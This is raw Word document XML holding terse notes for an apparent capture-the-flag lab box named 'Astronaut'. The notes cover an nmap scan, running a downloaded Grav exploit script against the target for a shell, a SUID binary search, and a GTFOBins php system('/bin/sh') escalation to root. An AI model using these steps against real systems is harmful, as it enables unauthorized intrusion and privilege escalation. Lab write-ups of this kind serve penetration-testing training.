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13CD5513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E41888">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Astronaut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7E487C16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E41888">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sC -sV t_ip - -min-rate 1000 -T 4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5AAC7820" w14:textId="697639B1" w:rsidR="00E41888" w:rsidRDefault="00E4188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visit the website with open the grey admin</w:t>
      </w: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768F71C6" w14:textId="77777777" w:rsidR="00A46093" w:rsidRDefault="00A46093" w:rsidP="00A4609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grav exploit = download it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780CA6FF" w14:textId="77777777" w:rsidR="00A46093" w:rsidRDefault="00A46093" w:rsidP="00A4609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chmod +x it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186F7E66" w14:textId="77777777" w:rsidR="00A46093" w:rsidRDefault="00A46093" w:rsidP="00A4609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python 49999.py HTTP://IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850C8FA" w14:textId="77777777" w:rsidR="00A46093" w:rsidRDefault="00A46093" w:rsidP="00A4609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just change the ip and port then again re enter into it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7250344F" w14:textId="77777777" w:rsidR="00A46093" w:rsidRDefault="00A46093" w:rsidP="00A4609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obtain the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F3C1A6" w14:textId="77777777" w:rsidR="00A46093" w:rsidRDefault="00A46093" w:rsidP="00A4609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at home/alex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6758B606" w14:textId="77777777" w:rsidR="00A46093" w:rsidRDefault="00A46093" w:rsidP="00A4609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find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514BF146" w14:textId="77777777" w:rsidR="00A46093" w:rsidRDefault="00A46093" w:rsidP="00A4609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php4.7 = search on gtfobins php sudo and obtain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464DCD91" w14:textId="77777777" w:rsidR="009954D5" w:rsidRDefault="009954D5" w:rsidP="009954D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cmd=”/bin/sh”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D403A0" w14:textId="77777777" w:rsidR="009954D5" w:rsidRDefault="009954D5" w:rsidP="009954D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/usr/bin/php7.4 -r “system(‘$cmd’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BE3B3" w14:textId="77777777" w:rsidR="009954D5" w:rsidRDefault="009954D5" w:rsidP="009954D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and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>its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done we obtain the root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2DC30" w14:textId="1796E88F" w:rsidR="00843DCE" w:rsidRDefault="009954D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if not then use SUID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C0D8C61" w14:textId="02E41C73" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="009954D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and we got the shell and obtain proof.txt from desktop</w:t>
      </w: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17565"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00104391"/>
    <w:rsid w:val="00210F3A"/>
    <w:rsid w:val="003F14AD"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="005009CD"/>
    <w:rsid w:val="0056722A"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00910361"/>
    <w:rsid w:val="009954D5"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A46093"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00E41888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8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-31T15:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>